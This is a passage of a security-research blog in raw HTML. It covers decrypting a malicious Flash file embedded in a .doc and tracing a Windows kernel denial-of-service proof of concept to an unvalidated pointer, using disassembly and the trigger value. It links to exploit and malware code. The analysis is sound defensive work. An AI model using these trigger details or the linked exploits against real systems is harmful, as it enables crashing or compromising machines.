<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhol0jC1t0KzhWgzgSL9JII3r29GXFaXbTa6YoO5JjLZGe99uu2b_j_Wya7SgyuvmbSsTnokxhlN3s7M8JTAAe9HchvTXcU8EBP_iZ1AkwmwJyyjlbDpU_mAZqpYwyAIJMKbso0bYDks9M/s1600/img5.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhol0jC1t0KzhWgzgSL9JII3r29GXFaXbTa6YoO5JjLZGe99uu2b_j_Wya7SgyuvmbSsTnokxhlN3s7M8JTAAe9HchvTXcU8EBP_iZ1AkwmwJyyjlbDpU_mAZqpYwyAIJMKbso0bYDks9M/s640/img5.bmp" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Here we go, this code shows a xor encryption! Searching for a decryption script I found </span><a href="https://gist.github.com/1509527/d3dca7ed75d090b68e4a3d84d1129923a9800390"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">this one</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">, but it doesn't work as it is.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So,</span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> I rearranged the code to make it work with this sample. I only had to use the "decrypt" function properly, and fix the following lines:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">byte block_size = (byte) (buffer.get() - 1);</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">byte key = (byte) (buffer.get() - 1);</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int offset = buffer.getInt() - 2;</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int length = buffer.getInt() - 2;</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Once decrypted and decompressed, the result will be a file containing three concatenated Flash files. The first and third Flash files are from the DoSWF and only contain some metadata and license information. The original malicious Flash file is the second one, and you can find it <a href="http://pastebin.com/fbPRL3ih">here</a> (thanks to contagiodump for the link).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This is our final exploit! If we give a look at the code we will find: a shellcode (line 23); a heapspray (line 133); some other stuff including cookies usage, </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">a Rtmp connection and </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">some control on the Windows version.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I'm unable to determine where the vulnerability is: maybe the exploit works only on certain software conditions, or maybe the Rtmp connection is involved in some way, or there's some other missing detail... I don't know! I think that I haven't got enough information to fully understand what happens, but at least here it's an idea of how the attack is structured: more complicated than usual .doc based attacks!</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">One final detail about the .doc file: as usual a exe file is appended at the end of the OLE, this one is a PE encrypted with a byte-per-byte xor using 0x70 as key (bytes that are 0 or 0x70 are not encrypted).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-73522440843812157732012-05-05T17:18:00.000-07:002012-05-06T11:36:06.159-07:00Analysis of a Microsoft Windows Kernel "Win32k.sys" Local Denial of Service Vulnerability<br />
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">A couple of days ago, a <a href="http://www.securityfocus.com/bid/53343/">Microsoft Windows Kernel "Win32k.sys" Local Denial of Service Vulnerability</a> (BID: 53343</span><span class="Apple-style-span" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: small;"><span class="Apple-style-span" style="font-size: 13px; line-height: 18px;">) </span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">has been published on the exploit-db website: follow <a href="http://www.exploit-db.com/exploits/18819/">this link</a> to get the poc code.</span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As I wanted to investigate this vulnerability, I compiled the code in Visual Studio and built the executable.</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then I ran it on a dedicated virtual machine, and…</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 14.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXghWISn1-2PTwmH-AgbFOikHaVBPj0b0P3CbNCdB7ypFgSUYaFpl3xnt1hoRmR0q0P7RtpzIMj3rAbbgtnrXG-mgS2p_WvcMaH6zwb0qCrvxfeFFEKvXDX1NDsHdnvCHww3x-Wk4evI/s1600/dest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXghWISn1-2PTwmH-AgbFOikHaVBPj0b0P3CbNCdB7ypFgSUYaFpl3xnt1hoRmR0q0P7RtpzIMj3rAbbgtnrXG-mgS2p_WvcMaH6zwb0qCrvxfeFFEKvXDX1NDsHdnvCHww3x-Wk4evI/s1600/dest.png" /></a></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 14.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Yeah… I got the dreaded Blue Screen Of Death! So… it worked :P</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This screen gives us useful information; we can read: "PAGE_FAULT_IN_NONPAGED_AREA" and then "STOP: 0x00000050 (0xFF7C98CC, 0x00000000, 0x805D33A5, 0x00000000)".</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now, if we read the <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff559023(v=vs.85).aspx">documentation</a> we get "Bug Check 0x50: </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">PAGE_FAULT_IN_NONPAGED_AREA</span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">". But, w</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">hat does that mean?</span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> Well, in the Windows Kernel, the memory is divided into two kinds: paged memory and nonpaged memory.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Basically the difference is that the former can be swapped to the disk while the latter can't. </span><span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, the error means that the kernel referenced an invalid memory location within the area reserved to the nonpaged memory.</span></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><br /></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">The parameters of the Bug Check stand respectively for: memory address being referenced ("0xFF7C98CC"); read operation/write operation (0 in this case indicates that read operation mode is selected); address that referenced memory (0x805D33A5, the line of code where the crash happened); reserved (that is not set).</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I opened ntkrnlpa.exe with IDA, I loaded the debug symbols and searched for the address that caused the crash, getting this:</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC3A5 cmp word ptr [ecx], 23h</span></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This means that ecx cointans an invalid pointer.</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Also, IDA tells us that we are inside the function:</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC370 ; int __stdcall RtlpGetIntegerAtom(ULONG CrashPointer,int)</span></span></span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"><span style="line-height: 20px;"> </span></span></div>
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then, analyzing the code of the function:</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></span></span></div>
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC372 push ebp</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC373 mov ebp, esp</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC375 push ecx</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC376 push ecx</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC377 mov ecx, [ebp+CrashPointer]</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC37A test ecx, 0FFFF0000h</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC380 jnz short Crash_Dead</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace; line-height: 20px;">...</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace; line-height: 20px;">PAGE:004FC3A5 Crash_Dead:</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC3A5 cmp word ptr [ecx], 23h</span></span></span></span></span><br />
<br />
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<br /></div>
</div>
<div style="color: #1e1e1e; font-family: 'Courier New'; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 18px;">
<span style="font-family: Verdana, sans-serif; font-size: small; line-height: normal;">we see that the invalid pointer is the first parameter of the function, and it is accessed without being properly validated.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span style="font-family: Verdana, sans-serif; font-size: small; line-height: normal;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Besides, we can see that the memory location being accessed is the same that is passed from the user mode POC code:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<span class="Apple-style-span">
</span><br />
<span class="Apple-style-span"><div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">UINT c[]={ </span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0x00000000,0x28001500,<span class="Apple-style-span" style="color: purple;"><b>0xff7c98cc</b></span>,0x23ffffff</span></span></div>
<div style="color: #1e1e1e; font-family: Verdana;">
<br /></div>
<div style="font-family: Verdana;">
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Thus we know that the pointer from user mode is never validated or modified in any way.</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">From the cross-references we see that the previous function is called by these two functions:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlAddAtomToAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlLookupAtomInAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Both these functions don't validate the pointer either. In particular we can see it from the code of the second one:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC692 push 18h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC694 push offset dword_4031A0</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC699 call __SEH_prolog</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC69E push [ebp+arg_0]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A1 call _RtlpLockAtomTable@4;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A6 test al, al</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A8 jnz short loc_4FC6B4</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6AA mov eax, 0C000000Dh</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6AF jmp loc_4FC76C</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B4 xor edi, edi</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B6 mov [ebp+ms_exc.disabled], edi</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B9 lea eax, [ebp+var_20]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6BC push eax ; int</span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6BD mov esi, [ebp+PointerCrash]</span></span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6C0 push esi ; CrashPointer</span></span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6C1 call _RtlpGetIntegerAtom@8 ;</span></span><span class="Apple-style-span" style="color: #cc0000; font-size: small;"> </span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This function is the one used in the exploit.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Again, from the cross-references we got that this function is called by NtFindAtom, which instead does valid proper validation:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B81 mov ecx, [ebp+CopyOfCrashPointer]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B87 lea eax, [ecx+ebx]</span></span></div>
